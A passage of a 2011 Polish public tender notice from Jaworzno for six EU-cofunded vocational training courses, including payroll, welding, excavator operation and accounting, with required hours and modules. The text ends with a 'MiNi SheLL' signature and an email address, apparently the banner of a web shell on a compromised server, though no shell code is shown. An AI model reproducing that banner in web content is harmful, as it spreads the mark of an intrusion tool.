<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 22.04.2011 godzina 10:00, miejsce: ul. Północna 9b, 43-600 Jaworzno, I piętro pokój nr 124.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt Teraz My - Młodzi współfinansowany przez Unię Europejską 
ze środków Europejskiego Funduszu Społecznego, realizowany w ramach 
Programu Operacyjnego Kapitał Ludzki- Poddziałanie 7.2.1.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> I.  Zakres Pracownik ds. kadrowo-płacowych
Ilość osób: 5 osób w jednej edycji..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Czas realizacji: nie dłużej niż 9 tygodni.  
Program szkolenia: minimalna ilość godzin - 230, w tym minimum 180 godzin ćwiczeń.
Program szkolenia musi zawierać:
1. modułowy program szkolenia zawodowego dla zawodu: księgowy, z zakresu: księgowy ds. płac i rozliczeń
z ZUS (kod zawodu: 343201) z następującymi jednostkami modułowymi: 
1) wynagrodzenie za pracę - minimum 26 godzin; 
2) ochrona wynagrodzenia za pracę i obowiązki pracodawców - minimum 27 godzin; 
3) rozliczenie składek ZUS - minimum 22 godziny; 
4) zasiłki z ubezpieczenia społecznego - minimum 30 godziny; 
5) kompletowanie wniosków o emerytury i renty oraz ustalenie kapitału początkowego - minimum 18 godzin; 
Uwaga: Każda jednostka modułowa musi zawierać wszystkie jednostki szkoleniowe zgodnie                      z modułowym programem szkolenia dostępnym na stronie www.standardyiszkolenia.praca.gov.pl.
2.  jednostkę modułową: zagadnienia z zakresu kadr, w tym elementy związane z prawem pracy- minimum
33 godziny.
3.   jednostkę modułową: obsługa programu PŁATNIK- minimum 22 godziny,
4.   jednostkę modułową: obsługa programu SYMFONIA - minimum 22 godziny,
5.   jednostkę modułową: obsługa komputera, w tym edytor tekstu i arkusz kalkulacyjny - minimum 30 godzin.
Dodatkowe wymagania: Wykonawca zakupi dla każdego uczestnika szkolenia książkę, której tematyka zgodna będzie z zakresem szkolenia oraz kodeks pracy..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 63.</p></li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> II.  Zakres Przedstawiciel handlowy z prawem jazdy kat. B
Ilość osób: 5 osób w jednej edycji..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Czas realizacji: nie dłużej niż 8 tygodni.  
Program szkolenia:  minimalna ilość godzin - 150, w tym minimum 90 godzin ćwiczeń. 
Program szkolenia musi zawierać:
1. modułowy program szkolenia zawodowego dla zawodu: przedstawiciel handlowy (kod zawodu: 341503) 
z następującymi jednostkami modułowymi:
	1) kształtowanie wizerunku akwizytora - minimum 20 godzin, 
	2) przeprowadzanie analizy rynku i wybór docelowych segmentów rynku - minimum 25 godzin,
	3) prowadzenie sprzedaży akwizycyjnej - minumum 30 godzin,
Uwaga: Każda jednostka modułowa musi zawierać wszystkie jednostki szkoleniowe zgodnie                      z modułowym programem szkolenia dostępnym na stronie www.standardyiszkolenia.praca.gov.pl.
2. jednostkę modułową: prawo jazdy kat. B - minimum 60 godzin. 
3. jednostkę modułową: obsługa kasy fiskalnej i terminali płatniczych - minimum 15 godzin. 
Program szkolenia musi być zgodny z obowiązującymi przepisami prawa tj. ustawą z dnia 20 czerwca 1997r. - Prawo o ruchu drogowym (tekst jednolity: Dz. U. z 2005r. Nr 108 poz. 908 z późn. zm.) oraz  rozporządzeniem  Ministra Infrastruktury z dnia 27 października 2005r. w sprawie szkolenia, egzaminowania i uzyskiwania uprawnień przez kierujących pojazdami,  instruktorów i egzaminatorów (Dz. U. Nr 217 poz. 1834 z późn. zm.).
Dodatkowe wymagania: Uczestnik szkolenia otrzyma zaświadczenie zgodnie z ww. rozporządzeniem. Wykonawca dokona opłaty za pierwszy egzamin państwowy przeprowadzony w Wojewódzkim Ośrodku Ruchu Drogowego..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 56.</p></li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> III.  Zakres  Spawacz spoin pachwinowych blach i rur w metodzie MAG
Ilość osób: 5 osób w jednej edycji..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Czas realizacji: nie dłużej niż 8 tygodni.  
Program szkolenia: minimalna ilośc godzin - 145 godzin, w tym minimum 120 godzin ćwiczeń.
Program szkolenia powinien zostać opracowany zgodnie z wytycznymi Instytutu Spawalnictwa w Gliwicach oraz powinien uwzględniać przepisy Rozporządzenia Ministra Gospodarki z dnia 27 kwietnia 2000r. w sprawie bezpieczeństwa i higieny pracy przy pracach spawalniczych (Dz. U. Nr 40 poz. 470).
Dodatkowe wymagania: Każdy uczestnik szkolenia powinien otrzymać książkę spawacza oraz świadectwo egzaminu spawacza wydane przez Instytut Spawalnictwa w Gliwicach..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 56.</p></li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> IV.  Zakres Operator koparko - ładowarki wszystkie typy klasa III
Ilość osób: 5 osób w jednej edycji..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Czas realizacji: nie dłużej niż 7 tygodni. 
Program szkolenia: minimalna ilość godzin szkolenia - 202 godziny. Szkolenie powinno  być zorganizowane zgodnie z Rozporządzeniem Ministra Gospodarki z dnia 20 września 2001r. w sprawie bezpieczeństwa i higieny pracy podczas eksploatacji maszyn i innych urządzeń technicznych do robót ziemnych, budowlanych                   i drogowych (Dz. U. Nr 118 poz. 1263), przeprowadzone w oparciu o program zatwierdzony przez Instytut Mechanizacji Budownictwa i Górnictwa Skalnego w Warszawie. 
Dodatkowe wymagania: Każdy uczestnik szkolenia powinien otrzymać świadectwo oraz uzyskać wpis do książki operatora wydane przez Instytut Mechanizacji Budownictwa i Górnictwa Skalnego w Warszawie..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 49.</p></li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> V.  Zakres Obsługa biurowa przedsiębiorstwa z zastosowaniem komputera i kasy fiskalnej
Ilość osób: 5 osób w jednej edycji..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Czas realizacji: nie dłużej niż 6 tygodni.  
Program szkolenia: minimalna ilość godzin szkolenia - 150 godzin, w tym minimum 70 godzin ćwiczeń. 
Program szkolenia powinien być dostosowany do standardów kwalifikacji zawodowych dla zawodu: pracownik administracyjny (kod zawodu: 343401) i pracownik biurowy (kod zawodu:419101) oraz musi zawierać następujące jednostki modułowe: 
1) organizowanie pracy własnej zgodnie z zasadami ergonomii, bezpieczeństwa i higieny pracy oraz ochrony  przeciwpożarowej i ochrony środowiska  i zarzadzanie w jednoste organizacyjnej,
2) organizowanie pracy własnej na stanowisku technika administracji, usprawnianie pracy oraz doskonalenie osobistych kompetencji,
3) organizowanie spotkań służbowych, z kontrahentami, pracownikami i klientami oraz innych prac związanych z funkcjonowaniem przedsiębiorstwa,
4) przyjmowanie i obsługiwanie interesantów,
5) wykonywanie prac admninistracyjnych związanych z ogólną działalnością jednostki organizacyjnej,
6) zapewnianie przepływu informacji i dokumentów wewnątrz i na zewnątrz organizacji,
7) sporządzanie dokumentacji prawnej oraz dokumentacji spraw pracowniczych związanej z działalnością jednostki organizacyjnej zgodnie z przyjętym systemem kancelaryjnym,
8) przygotowanie i udostępnianie dokumentacji do kontroli,
9) redagowanie korespondencji biurowej w języku polskim,
10) sporządzanie umów, dokumentacji spraw kancelaryjno - biurowych, pracowniczej oraz finansowej związanej z działalnością jednostki gospodarczej,
11) przechowywanie i archiwizowanie informacji, dokumentów oraz akt spraw,

12) gromadzernie i wykorzystywanie informacji ekonomicznych i statystycznych w pracy pracownika administracyjnego,
13) tworzenie i prowadzenie bazy danych kontrahentów,
14) stosowanie przepisów prawa w pracy zawodowej,
15) wykonywanie prac biurowych,
16) współpraca z innymi komórkami organizacyjnymi jednostki,
17) współpraca z otoczeniem zewnętrznym jednostki organizacyjnej ,
18) kierowanie zespołem pracowników administracyjno-biurowych,
19) ocenianie jakości i efektywności własnych działań zawodowych,
20) obsługa urządzeń biurowych,
21) obsługa komputera (edytor tekstu, arkusz kalkulacyjny, system obsługi baz danych, program do prezentacji multimedialnych, poczta elektroniczna, obsługa Internetu) - minimum 30 godzin, 
22) obsługa kasy fiskalnej - minimum 10 godzin. 
Dodatkowe wymagania: Wykonawca zakupi dla każdego uczestnika szkolenia książkę, której tematyka zgodna będzie z zakresem szkolenia..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 42.</p></li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> VI.  Zakres Obsługa biura rachunkowego z elementami księgowości
Ilość osób: 5 osób w I grupie..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Czas realizacji: nie dłużej niż 9 tygodni.  
Program szkolenia: minimalna ilość godzin szkolenia -  230 godzin, w tym minimum 160 godzin ćwiczeń. 
Program szkolenia musi zawierać:
1. modułowy program szkolenia zawodowego dla zawodu: księgowy, z zakresu: księgowy ds. rachuby płac (kod zawodu: 343201) z następującymi jednostkami modułowymi:
1) ogólne zasady rachunkowości - minimum 10 godzin, 
2) ewidencja operacji gospodarczych - minimum 5 godzin, 
3) organizacja rachunkowości w jednostkach gospodarczych - minimum 5 godzin, 
4) sporządzanie list płac i rozdzielników - minimum 10 godzin, 
5) sporzadzanie list zasiłków i deklaracji ZUS - minimum 10 godzin, 
6) rozliczanie podatku dochodowego od osób fizycznych - minimum 10 godzin, 
7) ewidencja rozrachunków z pracownikami - minimum 5 godzin, 
8) ewidencja rozrachunków publiczno - prawnych - minimum 10 godzin, 
9) ewidencja pozostalych rozrachunków - minimum 5 godzin, 
2. modułowy program szkolenia zawodowego dla zawodu: specjalista do spraw rachunkowości, z zakresu: sporządzanie i analiza bilansu, przygotowywanie sprawozdań finansowych (kod zawodu: 241205) 
z następującymi jednostkami modułowymi: 
1) sporządzanie i analiza bilansu - minimum 30 godzin;
2) sporządzanie i analiza rachunku zysków i strat - minimum 20 godzin;
3) sporządzanie rachunku przepływów pieniężnych - minimum 15 godzin;
4) zestawienie zmian w kapitale (funduszu) własnym - minimum 15 godzin;
5) dodatkowe informacje i objaśnienia sprawozdań finansowych - minimum 5 godzin;
Uwaga: Każda jednostka modułowa musi zawierać wszystkie jednostki szkoleniowe zgodnie                      z modułowym programem szkolenia dostępnym na stronie www.standardyiszkolenia.praca.gov.pl.
3.  jednostkę modułową: zagadnienia związane z prawem pracy- minimum 5 godzin,
4.   jednostkę modułową: obsługa programu PŁATNIK- minimum 20 godzin,
5.   jednostkę modułową: obsługa programu SYMFONIA - minimum 20 godzin,
6.   jednostkę modułową: obsługa komputera, w tym edytor tekstu i arkusz kalkulacyjny - minimum 30 godzin.
Dodatkowe wymagania: Wykonawca zakupi dla każdego uczestnika szkolenia książkę, której tematyka zgodna będzie z zakresem szkolenia oraz kodeks pracy..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 63.</p></li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com